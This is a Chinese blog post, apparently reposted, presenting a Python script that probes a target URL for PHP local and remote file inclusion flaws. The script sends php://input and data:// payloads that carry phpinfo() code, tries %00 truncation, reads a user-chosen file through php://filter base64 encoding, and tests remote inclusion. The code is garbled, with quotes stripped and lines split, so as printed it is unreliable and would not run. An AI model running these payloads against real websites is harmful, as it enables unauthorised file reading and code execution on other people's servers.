2. 程式人生 > >python打造文件包含漏洞檢測工具

python打造文件包含漏洞檢測工具

阿新 發佈:2018-06-17
毒藥 warning UNC plain con int www base64 ble

0x00前言:

做Hack the box的題。感覺那個平臺得開個VIp

不然得涼。一天只能重置一次。。。mmp

做的那題毒藥是文件包含漏洞的題,涉及到了某個工具

看的不錯就開發了一個。

0x01代碼:

import requests
import threading
import os
import time
import sys

cookies={}
urls=input(Please enter the target:)
user=input(Enter the file you want to read:)
user2=input(Enter your cookie:
 
)
for lie in user2.split(;):
    key,value=lie.split(=,1)
    cookies[key]=value
payload=php://input
payload2=data:text/plain,<?php phpinfo();?>%00
payload2s=data:text/plain,<?php phpinfo();?>
payload3=php://filter/read=convert.base64-encode/resource={}.format(user)
error=[404
 
,Not Found,Warning,不存在,找不到,防火墻,安全狗,雲鎖]

def exploitone(user):
    headers={user-agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)}
    url=user
    pocone=url+payload
    poctwo=url+payload2
    pocsan=url+payload3
    pocsi
 
=url+payload2s
    request=requests.get(url=pocone,headers=headers,cookies=cookies)
    request2=requests.get(url=poctwo,headers=headers,cookies=cookies)
    request3=requests.get(url=pocsan,headers=headers,cookies=cookies)
    request4=requests.get(url=pocsi,headers=headers,cookies=cookies)
    ok=[]
    for e in error:
        if request.status_code==200:
            if e in str(request.text):
                print([-]Php://input protocol does not support)
            else:
                ok.append([+]Support php://input protocol Poc:{}.format(request.url))

        if request2.status_code==200:
            if e in str(request2.text):
                print([-]Data:// protocol that does not support%00 truncation)
            else:
                ok.append([+]Data:// protocol that supports%00 truncation Poc2:{}.format(request2.url))


        if request3.status_code==200:
            if e in str(request3.text):
                print([-]Do not support the use of php://filter/read=convert.base64-encode/resource=)
            else:
                ok.append([+]Support php://filter/read=convert.base64-encode/resource= Poc3:{}.format(request3.url))

        if request4.status_code==200:
            if e in str(request4.text):
                print([-]Data:// protocol does not support)
            else:
                ok.append([+]Support with data:// protocol Poc4:{}.format(request4.url))

    if len(ok)>0:
        v=list(set(ok))
        for vv in v:
            print(vv)

exploitone(urls.rstrip())

def exploittwo():
    poc=http://www.baidu.com
    url=urls.rstrip()+poc
    headers={user-agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)}
    request2=requests.get(url=url,headers=headers,cookies=cookies)
    yuan=[]
    for e in error:
        if request2.status_code==200:
            if e in str(request2.text):
                print([-]Remote inclusion failure)
            else:
                yuan.append([+]Allow remote inclusion poc:{}.format(request2.url))
    if len(yuan)>0:
        s=list(set(yuan))
        for b in s:
            print(b)
exploittwo()

測試:

技術分享圖片

思路:

先檢測各種協議,然後測試遠程包含漏洞

原本還有一個檢測路徑的,但是跑起來太慢。

python打造文件包含漏洞檢測工具

相關推薦

python打造包含漏洞檢測工具

毒藥 warning UNC plain con int www base64 ble 0x00前言: 做Hack the box的題。感覺那個平臺得開個VIp 不然得涼。一天只能重置一次。。。mmp 做的那題毒藥是文件包含漏洞的題,涉及到了某個工具 看的不錯就開發

【代碼審計】VAuditDemo 包含漏洞

http code 頭像 col 函數 文件名 中一 判斷 包含漏洞 在 index.php中先判斷get過來的module是否設置了變量,如果已經設置,則包含module,並與字符串.inc拼接 inc格式一般是圖標或者頭像格式,因此我們可以初步判斷,這個包含應該是基於

web實戰之包含漏洞小嘗試

web安全本文出自 “大李子” 博客,謝絕轉載!web實戰之文件包含漏洞小嘗試

PHP:包含漏洞

data adf 校驗和 all php版本 req 服務器文件 常用 man 簡單記錄一些文件包含漏洞的常用方法 產生原因: 文件包含漏洞的產生原因是在通過引入文件時,由於傳入的文件名沒有經過合理的校驗,或者校檢被繞過,從而操作了預想之外的文件,就可能導致意外的文件泄露甚

包含漏洞

use att read font 加載 文件的 根目錄 暴露 提交數據 在通過PHP的函數引入文件時,由於傳入的文件名沒有經過合理的校驗,從而操作了預想之外的文件,導致意外的文件泄露甚至惡意的代碼註入。 HP常見的導致文件包含的函數如下:include(),include

URL重定向漏洞python打造URL重定向漏洞檢測腳本

我們 防止 其他 bre enter 開發 來源 current 後臺管理 前言: 今天學習了重定向漏洞,這個漏洞比較好理解 漏洞名:URL重定向漏洞 威脅:低 漏洞的來源:開發者對head頭做好對應的過濾和限制 例子: 有漏洞的網站:http://a.c

包含漏洞進階篇

com http base64編碼 style 本地文件 遠程 存在 size 宋體 前言: 文件包含漏洞雖然在前面已經說過,但是感覺還不到火候。這次在度 深入了解。 目錄: 本地文件包含漏洞的進階 遠程文件包含漏洞 正文: 進入之後選擇文件包含漏洞,如下圖

包含漏洞總結

shell. github 引用 常見 logs zip 協議 ria etc 前言: 本人(九世)正式從博客園:遷移到:http://hackhat.net。會進行同步更新 正文: 漏洞來源: 文件包含漏洞,得從文件包含說起。一般寫代碼的人都知道,完成一個項目

php包含漏洞(利用phpinfo)復現

.com shell 發送數據包 上下文 ade lob 刪除 緩沖 com 利用docker復現該漏洞,訪問http://192.168.80.156:8080/phpinfo.php,可以看到頁面出現phpinfo頁面 再訪問http://192.168.80.

Discuz!X 3.4 任意刪除漏洞復現過程(附python腳本)

文件刪除 def aaa dal -1 headers bug send auth   今天看下群裏在討論Discuz!X 3.4 任意文件刪除漏洞,自己做了一些測試,記錄一下過程。結尾附上自己編寫的python腳本,自動化實現任意文件刪除。 具體漏洞,請查看 https:

Python目錄比較工具filecmp和difflib

返回 我沒 直接 既然 hash this 上下 direct 不同   在一些運維場景中,常常需要比較兩個環境中的應用目錄結構(是否有文件/目錄層面上的增刪)以及比較兩個環境中同名文件內容的不同(即文件層面上的改)。Python自帶了兩個內建模塊可以很好地完成這個工作,f

檢測dll是32/64位?(直接讀dll包含的某幾個字節進行判斷)

tle toc 進行 too mach comm include hello urn 檢查dll是32位還是64位? [cpp] view plain copy #include "stdafx.h" #include <Wi

基於Python3的漏洞檢測工具 ( Python3 插式框架 )

lang gin detection print shel load nec list auto [TOC] Python3 漏洞檢測工具 -- lance lance, a simple version of the vulnerability detection fra

WebLogic 任意上傳 遠程代碼執行漏洞 (CVE-2018-2894)------->>>任意上傳檢測POC

htm input ade print out vcg exc ops 上傳 前言: Oracle官方發布了7月份的關鍵補丁更新CPU(Critical Patch Update),其中針對可造成遠程代碼執行的高危漏洞 CVE-2018-2894 進行修復: http:

python pydoc-生成工具(彙總tcy)

pydoc-文件生成工具   2018/9/8 ------------------------------------------------------------------------------ 1.1.用途: 是python自帶的一個文件生成工具,使用p

#python# 操作和目錄

級別 編寫一個程序 路徑 pre 找文件 練習 itext os.path 當前 總結於廖雪峰老師的python教程。 操作文件和目錄的函數一部分放在os模塊中,一部分放在os.path模塊中。 總結如下: 1 os.path.abspath(‘.‘)

包含-筆記

本地文件 dsv 區別 eww output php ads -a 系統 以PHP為例 就可以使用 include require 來進行文件包含操作。目的是引用其他的文件、代碼。 當文件包含函數的參數用戶可控是可以引用惡意代碼。 DVWA_1.9此漏洞模塊

Python之-操作

() blog com nbsp .cn read images align bsp 1、打開:open或file 2、讀寫:f.read() Python之-文件操作

python csv打開錯誤:_csv.Error: line contains NULL byte

sum print question utf-16 null ecs 格式 .cn repl 正常的csv文件讀取如下: #coding:utf-8 import csv csvfilename = ‘demo.csv‘ print u‘########

python筆記--處理

python、文件處理文件處理1.open函數(1)語法:文件句柄 = open(‘文件路徑‘, ‘模式‘)打開文件時,需要指定文件路徑和以何等方式打開文件,打開後,即可獲取該文件句柄,之後通過此文件句柄對該文件進行操作。操作文件時,一般需要經歷三個步驟:打開文件、操作文件、關閉文件,例如:>>&